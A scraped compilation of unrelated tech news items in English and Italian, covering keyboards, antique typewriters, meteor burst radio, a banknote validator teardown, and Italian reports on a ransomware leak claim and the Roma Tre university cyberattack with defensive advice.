And because it uses this Wi-Fi-enabled microcontroller, it can seamlessly integrate with Home Assistant via ESPHome.
What else is under the hood? Four low-profile Cherry MX Browns and a rotary encoder underneath that nicely-printed knob.
If you want to build one of these for yourself, all the files are available on GitHub including the customizable enclosure which [likeablob] designed with OpenSCAD.
Portable Endgame, If It Exists
Perhaps [Palpatine]’s one mistake in creating this 36-key portable endgame is believing in the idea of the endgame in the first place. But I’m not here to judge.
Image by [Palpatine] via redditOh wait, yes I am! I really like this keyboard, and I think it would look right at home on the desk of the centerfold below it, although it’s supposed to be a go-anywhere contraption. Be sure to check out the gallery on this one to see it folded together for transport.
It would seem that [Palpatine] learned some nice tricks while designing this keyboard. Have you heard of 10440 batteries? They’re 3.7 V and usually cheaper than the square Li-Po batteries of the same size.
This bad boy is based on the Seeed Xiao nRF52840, which [Palpatine] believes is worth spending a little bit of extra money on instead of nice!nano clones, while being cheaper than an actual nice!nano would be.
As far as open-sourceness goes, [Palpatine] seems willing to share their design files, although they don’t seem to have been published anywhere at this time.
What do you think? Crisp and clean, or cold and clinical? I can’t decide. I definitely feel snowbound vibes, and I want to sleep in.
Do you rock a sweet set of peripherals on a screamin’ desk pad? Send me a picture along with your handle and all the gory details, and you could be featured here!
Historical Clackers: the Munson
Image by [Martin Howard] via Antique TypewritersThe delight of the Munson typewriter is in the exposed internal workings, which come to life when the machine is in use. Those octagonal key tops aren’t too shabby, either.
You may have noticed that this machine has no typebars. Instead, it uses a horizontal cylinder about the size of a finger. The cylinder slides from side to side and rotates to find the chosen character. Then a hammer strikes from behind the paper, pushing it against the ribbon and the type cylinder.
Much like the later IBM Selectrics and the daisy wheel machines of the 1970s and ’80s, one could easily change the font by swapping out the all-steel type cylinder. The Munson has two Shift keys, one for upper case and another for figures, so only three rows of keys are needed.
The Munson came out in 1890 and was well-received. It won the highest medal awarded at the World’s Fair Chicago, 1893, but the machines are hard to find these days. Eight years after its introduction, the design of the Munson was acquired by the Chicago Writing Machine Co. and rebranded the Chicago.
Finally, the MingKwai Typewriter Emerges From Obscurity
So you get a Historical Clackers two-fer this week; lucky you! After more than half a century, this fascinating Chinese typewriter turned up while a couple was cleaning out her grandfather’s basement in New York.
Jennifer Felix and her husband Nelson posted photos on a Facebook group trying to ID the machine. A flurry of enthusiastic comments flooded the forum, with many people offering to buy the machine. Photo by Elisabeth von Boch, courtesy of Stanford Libraries; image via This Is Colossal As it turns out, it’s a MingKwai — the only one in existence. And it’s now in the hands of Stanford Libraries.
This machine was invented in 1947 by a writer, translator, and linguist named Lin Yutang. The MingKwai, which means “clear and fast”, was the first compact concept Chinese typewriter to have a keyboard that was capable of producing 80,000+ characters.
How is that even possible? Mechanical sort and search. Seriously! Check this out: the 72-key board is made up of strokes and shapes, and the characters are arranged in linear order, like an English dictionary. To use it, you would press one of the 36 top keys and one of the 28 bottom keys simultaneously. This triggered a series of rotations in the internals and would bring eight characters into view in a small window that Lin called the “magic eye”. Finally, you would choose your desired character using the numbered keys in the bottom row.
The only known prototype was built by the Carl E. Krum company. Lin was unable to drum up commercial interest to produce it at scale, so he sold the rights and the prototype to Mergenthaler Linotype Company, where Jennifer Felix’s grandfather worked as a machinist. So it never went into production, and the prototype went home with with Grandpa.
It isn’t too often we post a hack that’s just a pure 3D print with no other components, but for this Giant Molecular Model kit by [3D Printy], we’ll make an exception. After all, even if you print with PLA every day, how often do you get to play with its molecular bonds? (If you want to see that molecule, check out the video after the break.)
There are multiple sizes of bonds to represent bond lengths, and two styles: flexible and firm. Flexible bonds are great for multiple covalent bonds, like carbon-carbon bonds in organic molecules. The bonds clip to caps that screw in to the atoms; alternately a bond-cap can screw the atoms together directly. A plethora of atoms is available, in valence values from one to four. The two-bond atom has 180 and 120-degree variations for greater accuracy. In terms of the chemistry this kit could represent, you’re only limited by your imagination and how long you are willing to spend printing atoms and bonds.
[3D Printy] was kind enough to release the whole lot as CC0 Public Domain, so we might be seeing these at craft fairs, as there’s nothing to keep you from selling the prints. Honestly, we can only hope; from an educational standpoint, this is a much better use of plastic than endless flexy dragons.
La guerra dell’informazione. Gli stati alla conquista delle nostre menti
L’informazione non è un pranzo di gala; non è un’opera letteraria, un disegno, un ricamo; non la si può fare con altrettanta eleganza, tranquillità e delicatezza, o con altrettanta dolcezza, gentilezza, cortesia, riguardo e magnanimità. La rivoluzione è un’insurrezione, un atto di violenza con il quale una classe ne rovescia un’altra». Se sostituiamo la parola informazione alla parola rivoluzione nel testo originale di Mao Zedong qui parafrasato dal “Libretto Rosso” (pp.12-13), possiamo condensare in una frase tutto il significato che il professore David Colon ha voluto trasferirci con il suo nuovo libro La Guerra dell’Informazione. Gli Stati alla conquista delle nostre menti (Piccola Biblioteca Einaudi, 2025).
Secondo il professore francese, docente di Storia della comunicazione, media e propaganda presso lo Sciences Po Centre d’Histoire di Parigi, nell’era dell’intelligenza artificiale e della guerra cognitiva, i mezzi di comunicazione tradizionali prima e i social media dopo sono il teatro di un conflitto senza esclusione di colpi, che ha come posta in gioco le nostre menti.
Colon descrive con dovizia di particolari trent’anni di questa guerra rimasta a lungo segreta svelando le strategie dei committenti e le logiche dei protagonisti: agenti segreti, diplomatici, giornalisti e hacker.
Pur riconoscendo che la logica dell’uso dell’informazione come arma di guerra abbia i suoi capisaldi nella disinformatia russa, nel political warfare americano e nella dottrina di guerra cinese, russa e americana, il professore decide di avviare la sua narrazione con una vicenda ignota ai più: la battaglia per il controllo dell’informazione all’epoca dell’invasione del Kuwait da parte dell’Iraq di Saddam Hussein. Una storia che fa impallidire tutti coloro che oggi temono le fake news nel processo democratico. All’epoca, infatti, per convincere gli stati Uniti a intervenire a sostegno del piccolo ma ricco paese del Golfo minacciato da Saddam, l’emirato ingaggiò una della maggiori aziende di public relations al mondo, la Hill&Knowlton per creare lo storytelling necessario. Usando circa 30 milioni di dollari, ingaggiando attori e pagando giornali e riviste, il primo evento di quella guerra ad essere propagandato all’unisono dai media internazionali fu infatti il racconto di una giovane infermiera kuwaitiana piangente che, a favore di telecamera, raccontò come la soldataglia di Saddam fosse entrata negli ospedali strappando i neonati dalle culle buttandoli a terra per farli morire di freddo, un fatto che commosse tutto il mondo libero, ma che non era vero. Si trattava di una bufala. Il fatto non era mai accaduto, e la giovane testimone dei presunti fatti era nientemeno che la figlia dell’ambasciatore del Kuwait all’ONU.
Di storie come questa Colon ne tratteggia molte nel suo testo, fino ad arrivare ai giorni nostri, all’occupazione russa della Crimea nel 2014 da parte dei russi e all’invasione del Donbass nel 2022, in una guerra che sicuramente si combatte nel fango del fiume Dnipro ma anche nella trincea di Internet dove eserciti regolari e irregolari si fronteggiano a colpi di virus, malware e propaganda, bianca, grigia e nera.
Lettura attraente che spazia dall’uso dei meme all’intelligenza artificiale nel conflitto Israele-Hamas, per descrivere l’impiego degli hacker di stato che un po’ rubano (cryptovalute), un po’ combattono sul fronte del sabotaggio cibernetico. Con un convitato di pietra, però: l’uso che gli stati democratici fanno dei media nei loro stessi paesi per conseguire quegli obbiettivi che i governi non possono dichiarare.
The world’s militaries have always been at the forefront of communications technology. From trumpets and drums to signal flags and semaphores, anything that allows a military commander to relay orders to troops in the field quickly or call for reinforcements was quickly seized upon and optimized. So once radio was invented, it’s little wonder how quickly military commanders capitalized on it for field communications.
Radiotelegraph systems began showing up as early as the First World War, but World War II was the first real radio war, with every belligerent taking full advantage of the latest radio technology. Chief among these developments was the ability of signals in the high-frequency (HF) bands to reflect off the ionosphere and propagate around the world, an important capability when prosecuting a global war.
But not long after, in the less kinetic but equally dangerous Cold War period, military planners began to see the need to move more information around than HF radio could support while still being able to do it over the horizon. What they needed was the higher bandwidth of the higher frequencies, but to somehow bend the signals around the curvature of the Earth. What they came up with was a fascinating application of practical physics: meteor burst communications.
Blame It on Shannon
In practical terms, a radio signal that can carry enough information to be useful for digital communications while still being able to propagate long distances is a bit of a paradox. You can thank Claude Shannon for that, after he developed the idea of channel capacity from the earlier work of Harry Nyquist and Ralph Hartley. The resulting Hartley-Shannon Theorem states that the bit rate of a channel in a noisy environment is directly related to the bandwidth of the channel. In other words, the more data you want to stuff down a channel, the higher the frequency needs to be.
Unfortunately, that runs afoul of the physics of ionospheric propagation. Thanks to the physics of the interaction between radio waves and the charged particles between about 50 km and 600 km above the ground, the maximum frequency that can be reflected back toward the ground is about 30 MHz, which is the upper end of the HF band. Beyond that is the very-high frequency (VHF) band from 30 MHz to 300 MHz, which has enough bandwidth for an effective data channel but to which the ionosphere is essentially transparent.
Luckily, the ionosphere isn’t the only thing capable of redirecting radio waves. Back in the 1920s, Japanese physicist Hantaro Nagaoka observed that the ionospheric propagation of shortwave radio signals would change a bit during periods of high meteoric activity. That discovery largely remained dormant until after World War II, when researchers picked up on Nagoka’s work and looked into the mechanism behind his observations.
Every day, the Earth sweeps up a huge number of meteoroids; estimates range from a million to ten billion. Most of those are very small, on the order of a few nanograms, with a few good-sized chunks in the tens of kilograms range mixed in. But the ones that end up being most interesting for communications purposes are the particles in the milligram range, in part because there are about 100 million such collisions on average every day, but also because they tend to vaporize in the E-level of the ionosphere, between 80 and 120 km above the surface. The air at that altitude is dense enough to turn the incoming cosmic debris into a long, skinny trail of ions, but thin enough that the free electrons take a while to recombine into neutral atoms. It’s a short time — anywhere between 500 milliseconds to a few seconds — but it’s long enough to be useful. A meteor trail from the annual Perseid shower, which peaks in early August. This is probably a bit larger than the optimum for MBC, but beautiful nonetheless. Source: John Flannery, CC BY-ND 2.0. The other aspect of meteor trails formed at these altitudes that makes them useful for communications is their relative reflectivity. The E-layer of the ionosphere normally has on the order of 107 electrons per cubic meter, a density that tends to refract radio waves below about 20 MHz. But meteor trails at this altitude can have densities as high as 1011 to 1012 electrons/m3. This makes the trails highly reflective to radio waves, especially at the higher frequencies of the VHF band.
In addition to the short-lived nature of meteor trails, daily and seasonal variations in the number of meteors complicate their utility for communications. The rotation of the Earth on its axis accounts for the diurnal variation, which tends to peak around dawn local time every day as the planet’s rotation and orbit are going in the same direction and the number of collisions increases. Seasonal variations occur because of the tilt of Earth’s axis relative to the plane of the ecliptic, where most meteoroids are concentrated. More collisions occur when the Earth’s axis is pointed in the direction of travel around the Sun, which is the second half of the year for the northern hemisphere.
Learning to Burst
Building a practical system that leverages these highly reflective but short-lived and variable mirrors in the sky isn’t easy, as shown by several post-war experimental systems. The first of these was attempted by the National Bureau of Standards in 1951. They set up a system between Cedar Rapids, Iowa, and Sterling, Virginia, a path length of about 1250 km. Originally built to study propagation phenomena such as forward scatter and sporadic E, the researchers noticed significant effects on their tests by meteor trails. This made them switch their focus to meteor trails, which caught the attention of the US Air Force. They were in the market for a four-channel continuous teletype link to their base in Thule, Greenland. They got it, but only just barely, thanks to the limited technology of the time. The NBS system also used the Iowa to Virginia system to study higher data rates by pointing highly directional rhombic antennas at each end of the connection at the same small patch of sky. They managed a whopping data rate of 3,200 bits per second with this system, but only for the second or so that a meteor trail happened to appear.
The successes and failures of the NBS system made it clear that a useful system based on meteor trails would need to operate in burst mode, to jam data through the link for as long as it existed and wait for the next one. The NBS tested a burst-mode system in 1958 that used the 50-MHz band and offered a full-duplex link at 2,400 bits per second. The system used magnetic tape loops to buffer data and transmitters at both ends of the link that operated continually to probe for a path. Whenever the receiver at one end detected a sufficiently strong probe signal from the other end, the transmitter would start sending data. The Canadians got in on the MBC action with their JANET system, which had a similar dedicated probing channel and tape buffer. In 1954 they established a full-duplex teletype link between Ottawa and Nova Scotia at 1,300 bits per second with an error rate of only 1.5%
In the late 1950s, Hughes developed a single-channel air-to-ground MBC system. This was a significant development since not only had the equipment gotten small enough to install on an airplane but also because it really refined the burst-mode technology. The ground stations in the Hughes system periodically transmitted a 100-bit interrogation signal to probe for a path to the aircraft. The receiver on the ground listened for an acknowledgement from the plane, which turned the channel around and allowed the airborne transmitter to send a 100-bit data burst. The system managed a respectable 2,400 bps data rate, but suffered greatly from ground-based interference for TV stations and automotive ignition noise.
The SHAPE of Things to Come
Supreme HQ Allied Powers Europe (SHAPE), NATO’s European headquarters in the mid-60s. The COMET meteor-bounce system kept NATO commanders in touch with member-nation HQs via teletype. Source: NATO The first major MBC system fielded during the Cold War was the Communications by Meteor Trails system, or COMET. It was used by the North Atlantic Treaty Organization (NATO) to link its far-flung outposts in member nations with Supreme Headquarters Allied Powers Europe, or SHAPE, located in Belgium. COMET took cues from the Hughes system, especially its error detection and correction scheme. COMET was a robust and effective MBC system that provided between four and eight teletype circuits depending on daily and seasonal conditions, each handling 60 words per minute.
COMET was in continuous use from the mid-1960s until well after the official end of the Cold War. By that point, secure satellite communications were nowhere near as prohibitively expensive as they had been at the beginning of the Space Age, and MBC systems became less critical to NATO. They weren’t retired, though, and COMET actually still exists, although rebranded as “Compact Over-the-Horizon Mobile Expeditionary Terminal.” These man-portable systems don’t use MBC; rather, they use high-power UHF and microwave transmitters to scatter signals off the troposphere. A small amount of the signal is reflected back to the ground, where high-gain antennas pick up the vanishingly weak signals.
Although not directly related to Cold War communications, it’s worth noting that there was a very successful MBC system fielded in the civilian space in the United States: SNOTEL. We’ve covered this system in some depth already, but briefly, it’s a network of stations in the western part of the USA with the critical job of monitoring the snowpack. A commercial MBC system connected the solar-powered monitoring stations, often in remote and rugged locations, to two different central bases. Taking advantage of diurnal meteor variations, each morning the master station would send a polling signal out to every remote, which would then send back the previous day’s data once a return path was opened. The system could collect data from 180 remote sites in just 20 minutes. It operated successfully from the mid-1970s until just recently, when pervasive cell technology and cheap satellite modems made the system obsolete.
— The drive to regulate artificial intelligence has given way to a desire to harness the emerging technology for economic benefit and national security.
— India and Pakistan agreed to a ceasefire in a quickly escalating regional conflict. That didn't stop waves of disinformation from spreading on social media.
— Platforms, citizens and governments should be responsible for creating a healthy digital environment, according to a global survey. But companies are more responsible than others for combating hateful online speech.
Some things are so common you forget about them. How often do you think about an ordinary resistor, for example? Yet if you have a bad resistor, you’ll find it can be a big problem. Plus, how can you really understand electronics if you don’t know all the subtle details of a resistor? In the mechanical world, you could make the same arguments about the washer, and [New Mind] is ready to explain the history and the gory details of using washers in a recent video that you can see below.
The simple answer is that washers allow a bolt to fit in a hole otherwise too large, but that’s only a small part of the story. Technically, what you are really doing is distributing the load of a threaded fastener. However, washers can also act as spacers or springs. Some washers can lock, and some indicate various things like wear or preloading conditions.
Plain washers have a surprising number of secondary functions. Spring washers, including Belleville washers, help prevent fasteners from loosening over time. Wave washers look — well — wavy. They provide precise force against the bolt for preloading. Locking washers are also made to prevent fasteners from loosening, but use teeth or stops instead of springs.
There are plenty of standards, of course, that mostly match up. Mostly.
If you like knowing about odd washers, you might also want to know about the bolts that pass through them.
“Intelligenza artificiale, intelligenza emotiva: futuro semplice o imperfetto?” è il tema della conferenza in programma sabato 10 maggio 2025 alle ore 9.00 nell’aula magna di giurisprudenza a Palazzo Cavallini, via San Faustino 41 a Brescia. Relatori Francesco Morace, Cosimo Accoto, Arturo Di Corinto, Daniele Monteleone, Nicoletta Cusano Salvatore Frattallone. Moderatori Teresa Croce e Luigi Della Bora; introduzione a cura del prof. Maurizio Tira. L’iniziativa è sotto l’egida di Lions, Leo, Fondazione Lions Clubs Distretto 108 Ib2 “Bruno Bnà” Ets, Comune di Brescia, Università degli Studi di Brescia e Fondazione UniBS.
Electronics-based art installations are often fleeting and specific things that only a select few people who are in the right place or time get to experience before they are lost to the ravages of ‘progress.’ So it’s wonderful to find a dedicated son who has recreated his father’s 1973 art installation, showing it to the world in a miniature form. The network-iv-rebooted project is a recreation of an installation once housed within a departure lounge in terminal C of Seattle-Tacoma airport. You can do a lot with a ‘pi and a fistful of Teensies! The original unit comprises an array of 1024 GE R6A neon lamps, controlled from a Data General Nova 1210 minicomputer. A bank of three analog synthesizers also drove into no fewer than 32 resonators. An 8×8 array of input switches was the only user-facing input. The switches were mounted to a floor-standing pedestal facing the display.
For the re-creation, the neon lamps were replaced with 16×16 WS2811 LED modules, driven via a Teensy 4.0 using the OctoWS2811 library. The display Teensy is controlled from a Raspberry Pi 4, hooked up as a virtual serial device over USB. A second Teensy (you can’t have too many Teensies!) is responsible for scanning a miniature 8×8 push button array as well as running a simulation of the original sound synthesis setup. Audio is pushed out of the Teensy using a PT8211 I2S audio DAC, before driving a final audio power amp.
Attempting to reproduce accurately how the original code worked would be tricky, if downright impossible, but fear not, as the network-iv-rebooted is running the original code. Since the artist was astute enough to keep not only the engineering drawings and schematics, but also the original paper tape of the Nova 1210 program, it could be successfully run using the SIMH Nova emulator. The simulator needed to be modified to support the optional ‘device 76’ GPIO device added to the Nova 1210 for handling the extra connectivity. This was a small price to pay compared to the alternative. That said, most of the heavy lifting on the I/O side is performed by the pair of Teensies, with modern coding methods making life a lot easier.
Mechanics and code for the reproduction are being collected on this GitHub repo for those interested in building a clone. The opu20 page has a few photos and details of the original installation, but many more pieces can be found on the sculptures page, complete with a neat video tour, which we also include below. Check out those circuit sculptures! Groovy!
[Wrongdog Recons] suffers from a severe case of nostalgia. His earlier project simulated broadcast TV, and he was a little surprised at how popular the project was on GitHub. As people requested features, he realized that he could create a simulated cable box and emulate a 1990s-era cable TV system. Of course, you also needed a physical box, which turned into another project. You can see more about the project in the video below.
Inside is, unsurprisingly, a Raspberry Pi. Then you have to pretend to be a cable TV scheduler and organize your different video files for channels. You can interleave commercials and station breaks.
One addition was a scheduler so you could set up things like football games only play during football season. You can also control timing so you don’t get beer commercials during Saturday morning cartoons.
We were especially impressed with the program guide channel that lets you see what’s playing, just like an old-style cable system. The simulation even plays trash TV in the morning and bizarre commercials post-midnight.
Ever wondered what happens when you insert a bill into a vending machine? [Janne] is back with his latest project: reverse engineering a banknote validator. Curious about how these common devices work, he searched for information but found few resources explaining their operation.
To learn more, [Janne] explored the security features that protect banknotes from counterfeiting. These can include microprinting, UV and IR inks, holograms, color-shifting coatings, watermarks, magnetic stripes, and specialty paper. These features not only deter fraud but also enable validators to quickly verify a bill’s authenticity.
[Janne] purchased several banknote validators to disassemble and compare. Despite varied exteriors, their core mechanisms were similar: systems to move the bill smoothly, a tape head to detect magnetic ink or security strips, and optical sensors to inspect visible, UV, and IR features. By reverse engineering the firmware of two devices, he uncovered their inner workings. There is a calibration procedure they use to normalize their readings, then it will analyze a bill through a sophisticated signal processing pipeline. If the data falls within a narrow acceptance range, the device authenticates the bill; otherwise, it rejects it.
Head over to his site to check out all the details he discovered while exploring these devices, as well as exploring the other cool projects he’s worked on in the past. Reverse engineering offers a unique window into technology Check out other projects we’ve featured showcasing this skill.
Did artificial intelligence just jump the shark? Maybe so, and it came from the legal world of all places, with this report of an AI-generated victim impact statement. In an apparent first, the family of an Arizona man killed in a road rage incident in 2021 used AI to bring the victim back to life to testify during the sentencing phase of his killer’s trial. The video was created by the sister and brother-in-law of the 37-year-old victim using old photos and videos, and was quite well done, despite the normal uncanny valley stuff around lip-syncing that seems to be the fatal flaw for every deep-fake video we’ve seen so far. The victim’s beard is also strangely immobile, which we found off-putting.
In the video, the victim expresses forgiveness toward his killer and addresses his family members directly, talking about things like what he would have looked like if he’d gotten the chance to grow old. That seemed incredibly inflammatory to us, but according to Arizona law, victims and their families get to say pretty much whatever they want in their impact statements. While this appears to be legal, we wouldn’t be surprised to see it appealed, since the judge tacked an extra year onto the killer’s sentence over what the prosecution sought based on the power of the AI statement. If this tactic withstands the legal tests it’ll no doubt face, we could see an entire industry built around this concept.
Last week, we warned about the impending return of Kosmos 482, a Soviet probe that was supposed to go to Venus when it was launched in 1972. It never quite chooched, though, and ended up circling the Earth for the last 53 years. The satellite made its final orbit on Saturday morning, ending up in the drink in the Indian Ocean, far from land. Alas, the faint hope that it would have a soft landing thanks to the probe’s parachute having apparently been deployed at some point in the last five decades didn’t come to pass. That’s a bit of a disappointment to space fans, who’d love to get a peek inside this priceless bit of space memorabilia. Roscosmos says they monitored the descent, so presumably they know more or less where the debris rests. Whether it’s worth an expedition to retrieve it remains to be seen.
Are we really at the point where we have to worry about counterfeit thermal paste? Apparently, yes, judging by the effort Arctic Cooling is putting into authenticity verification of its MX brand pastes. To make sure you’re getting the real deal, boxes will come with seals that rival those found on over-the-counter medications and scratch-off QR codes that can be scanned and cross-referenced to an online authentication site. We suppose it makes sense; chip counterfeiting is a very real thing, after all, and it’s probably as easy to put a random glob of goo into a syringe as it is to laser new markings onto a chip package. And Arctic compound commands a pretty penny, so the incentive is obvious. But still, something about this just bothers us.
Another very cool astrophotography shot this week, this time a breathtaking collection of galaxies. Taken from the Near Infrared camera on the James Webb Space Telescope with help from the Hubble Space Telescope and the XMM-Newton X-ray space observatory, the image shows thousands of galaxies of all shapes and sizes, along with the background X-ray glow emitted by all the clouds of superheated dust and gas between them. The stars with the characteristic six-pointed diffraction spikes are all located within our galaxy, but everything else is a galaxy. The variety is fascinating, and the scale of the image is mind-boggling. It’s galactic eye candy!
And finally, if you’ve ever wondered about what happens when a nuclear reactor melts down, you’re in luck with this interesting animagraphic on the process. It’s not a detailed 3D render of any particular nuclear power plant and doesn’t have a specific meltdown event in mind, although it does mention both Chernobyl and Fukushima. Rather, it’s a general look at pressurized water reactors and what can go wrong when the cooling water stops flowing. It also touches on potentially safer designs with passive safety systems that rely on natural convection to keep cooling water circulating in the event of disaster, along with gravity-fed deluge systems to cool the containment vessel if things get out of hand. It’s a good overview of how reactors work and where they can go wrong. Enjoy.
You normally think of ELINT — Electronic Intelligence — as something done in secret by shadowy three-letter agencies or the military. The term usually means gathering intelligence from signals that don’t contain speech (since that’s COMINT). But [Nukes] was looking at public data from NASA’s SMAP satellite and made an interesting discovery. Despite the satellite’s mission to measure soil moisture, it also provided data on strange happenings in the radio spectrum.
While 1.4 GHz is technically in the L-band, it is reserved (from 1.400–1.427 GHz) for specialized purposes. The frequency is critical for radio astronomy, so it is typically clear other than low-power safety critical data systems that benefit from the low potential for interference. SMAP, coincidentally, listens on 1.41 GHz and maps where there is interference.
Since there aren’t supposed to be any high-power transmitters at that frequency, you can imagine that anything showing up there is probably something unusual and interesting. In particular, it is often a signature for military jamming since nearby frequencies are often used for passive radar and to control drones. So looking at the data can give you a window on geopolitics at any given moment.
The data is out there, and a simple Python script can pull it. We imagine this is the kind of data that only a spook in a SCIF would have had just a decade or two ago.
Disclaimer: Questo rapporto include screenshot e/o testo tratti da fonti pubblicamente accessibili. Le informazioni fornite hanno esclusivamente finalità di intelligence sulle minacce e di sensibilizzazione sui rischi di cybersecurity. Red Hot Cyber condanna qualsiasi accesso non autorizzato, diffusione impropria o utilizzo illecito di tali dati. Al momento, non è possibile verificare in modo indipendente l’autenticità delle informazioni riportate, poiché l’organizzazione coinvolta non ha ancora rilasciato un comunicato ufficiale sul proprio sito web. Di conseguenza, questo articolo deve essere considerato esclusivamente a scopo informativo e di intelligence. Nel post pubblicato nelle underground dai criminali informatici viene riportato che la gang è in possesso di 100GB di dati, esfiltrati dalle infrastrutture IT del comune. Minacciano la pubblicazione tra 14 giorni.
In quella data ci sarà un aggiornamento del post. Sicuramente la gang in quella data potrà pubblicare una parte dei dati in loro possesso per aumentare la pressione sulla vittima.
I criminali informatici, per poter attestare che l’accesso alle infrastrutture informatiche è avvenuto con successo, riportano una serie di documenti (samples) afferenti all’azienda. Questo modo di agire – come sanno i lettori di RHC – generalmente avviene quando ancora non è stato definito un accordo per il pagamento del riscatto richiesto da parte dei criminali informatici. In questo modo, i criminali minacciando la pubblicazione dei dati in loro possesso, aumenta la pressione verso l’organizzazione violata, sperando che il pagamento avvenga più velocemente.
Come spesso riportiamo, l’accesso alle Darknet è praticabile da qualsiasi persona che sappia utilizzare normalmente un PC. Questo è importante sottolinearlo in quanto molti sostengono il contrario, spesso nei comunicati dopo la pubblicazione dei dati delle cybergang ransomware e tali informazioni sono pubblicamente consultabili come fonti aperte.
Come nostra consuetudine, lasciamo sempre spazio ad una dichiarazione da parte dell’azienda qualora voglia darci degli aggiornamenti sulla vicenda. Saremo lieti di pubblicare tali informazioni con uno specifico articolo dando risalto alla questione.
RHC monitorerà l’evoluzione della vicenda in modo da pubblicare ulteriori news sul blog, qualora ci fossero novità sostanziali. Qualora ci siano persone informate sui fatti che volessero fornire informazioni in modo anonimo possono utilizzare la mail crittografata del whistleblower.
Cos’è il ransomware as a service (RaaS)
Il ransomware, è una tipologia di malware che viene inoculato all’interno di una organizzazione, per poter cifrare i dati e rendere indisponibili i sistemi. Una volta cifrati i dati, i criminali chiedono alla vittima il pagamento di un riscatto, da pagare in criptovalute, per poterli decifrare.
Qualora la vittima non voglia pagare il riscatto, i criminali procederanno con la doppia estorsione, ovvero la minaccia della pubblicazione di dati sensibili precedentemente esfiltrati dalle infrastrutture IT della vittima.
Per comprendere meglio il funzionamento delle organizzazioni criminali all’interno del business del ransomware as a service (RaaS), vi rimandiamo a questi articoli:
Le infezioni da ransomware possono essere devastanti per un’organizzazione e il ripristino dei dati può essere un processo difficile e laborioso che richiede operatori altamente specializzati per un recupero affidabile, e anche se in assenza di un backup dei dati, sono molte le volte che il ripristino non ha avuto successo.
Infatti, si consiglia agli utenti e agli amministratori di adottare delle misure di sicurezza preventive per proteggere le proprie reti dalle infezioni da ransomware e sono in ordine di complessità:
Formare il personale attraverso corsi di Awareness;
Utilizzare un piano di backup e ripristino dei dati per tutte le informazioni critiche. Eseguire e testare backup regolari per limitare l’impatto della perdita di dati o del sistema e per accelerare il processo di ripristino. Da tenere presente che anche i backup connessi alla rete possono essere influenzati dal ransomware. I backup critici devono essere isolati dalla rete per una protezione ottimale;
Mantenere il sistema operativo e tutto il software sempre aggiornato con le patch più recenti. Le applicazioni ei sistemi operativi vulnerabili sono l’obiettivo della maggior parte degli attacchi. Garantire che questi siano corretti con gli ultimi aggiornamenti riduce notevolmente il numero di punti di ingresso sfruttabili a disposizione di un utente malintenzionato;
Mantenere aggiornato il software antivirus ed eseguire la scansione di tutto il software scaricato da Internet prima dell’esecuzione;
Limitare la capacità degli utenti (autorizzazioni) di installare ed eseguire applicazioni software indesiderate e applicare il principio del “privilegio minimo” a tutti i sistemi e servizi. La limitazione di questi privilegi può impedire l’esecuzione del malware o limitarne la capacità di diffondersi attraverso la rete;
Evitare di abilitare le macro dagli allegati di posta elettronica. Se un utente apre l’allegato e abilita le macro, il codice incorporato eseguirà il malware sul computer;
Non seguire i collegamenti Web non richiesti nelle e-mail;
Esporre le connessione Remote Desktop Protocol (RDP) mai direttamente su internet. Qualora si ha necessità di un accesso da internet, il tutto deve essere mediato da una VPN;
Implementare sistemi di Intrusion Prevention System (IPS) e Web Application Firewall (WAF) come protezione perimetrale a ridosso dei servizi esposti su internet.
Implementare una piattaforma di sicurezza XDR, nativamente automatizzata, possibilmente supportata da un servizio MDR 24 ore su 24, 7 giorni su 7, consentendo di raggiungere una protezione e una visibilità completa ed efficace su endpoint, utenti, reti e applicazioni, indipendentemente dalle risorse, dalle dimensioni del team o dalle competenze, fornendo altresì rilevamento, correlazione, analisi e risposta automatizzate.
Sia gli individui che le organizzazioni sono scoraggiati dal pagare il riscatto, in quanto anche dopo il pagamento le cyber gang possono non rilasciare la chiave di decrittazione oppure le operazioni di ripristino possono subire degli errori e delle inconsistenze.
La sicurezza informatica è una cosa seria e oggi può minare profondamente il business di una azienda.
Oggi occorre cambiare immediatamente mentalità e pensare alla cybersecurity come una parte integrante del business e non pensarci solo dopo che è avvenuto un incidente di sicurezza informatica.
Un grave attacco informatico ha colpito l’infrastruttura digitale dell’Università nella notte tra l’8 e il 9 maggio, causando l’interruzione improvvisa dei servizi online dell’Ateneo, inclusi siti istituzionali e piattaforme essenziali per studenti e personale docente.
Al momento è presente sul sito dell’università il seguente comunicato che mette offline il sito istituzionale. Secondo quanto riportato dall’Ateneo stesso in una comunicazione ufficiale, il primo allarme è scattato nella notte dell’8 maggio, quando i servizi informatici hanno smesso improvvisamente di funzionare. Già nelle ore notturne, l’Area Sistemi Informativi ha attivato i protocolli di emergenza, allertando l’Agenzia per la Cybersicurezza Nazionale (ACN) e la Polizia Postale, che si sono recate sul posto per le indagini.
Le operazioni di analisi e contenimento si sono protratte fino alle ore 2:00 del mattino successivo, consentendo di confermare la gravità dell’attacco e di avviare una prima valutazione dei danni all’infrastruttura digitale.
La Direzione 5 e la Direzione 7, insieme ai tecnici informatici dell’Università, sono al lavoro per il ripristino completo delle piattaforme, con l’obiettivo dichiarato di riportare online i principali servizi entro la giornata di lunedì.
Tra i sistemi prioritari:
Contabilità
Protocollo informatico
IRIS (archivio della ricerca)
Segreteria studenti (GOMP)
Proprio la piattaforma GOMP, fondamentale per studenti e docenti, è tornata accessibile già dalla serata del 9 maggio.
Mentre permangono difficoltà su alcuni fronti, la posta elettronica istituzionale risulta pienamente funzionante. Gli utenti possono accedervi utilizzando le proprie credenziali nei formati nome.cognome@stud.uniroma3.it (per gli studenti) e ncognome@os.uniroma3.it (per il personale). L’Ateneo ha promesso aggiornamenti continui sull’evoluzione della situazione e sui tempi di ripristino attraverso i canali ufficiali Attacco informatico sull'infrastruttura dell'Ateneo
Nella notte dell’8 maggio, si è registrata una interruzione dei servizi informatici di Ateneo. A seguito delle operazioni di verifica effettuate già nella notte e proseguite per tutta la mattina del 9 si è potuto constatare che l'infrastruttura dell'Ateneo è stata oggetto di un grave attacco informatico che ha reso inaccessibili i siti web di Ateneo.
Immediatamente dopo aver rilevato l'attacco, l'Area Sistemi Informativi ha contattato l'Agenzia per la Cybersicurezza Nazionale e la Polizia Postale che si sono prontamente recate presso le nostre sedi per attivare tutte le azioni necessarie. Tali procedure si sono protratte fino alle ore 02.00 di questa notte e sono state fondamentali per comprendere l'entità dell'attacco, valutare i danni e iniziare il processo di ripristino.
La Direzione 5 e la Direzione 7 stanno lavorando anche in queste ore per garantire il ripristino dei servizi principali entro la giornata di lunedì.
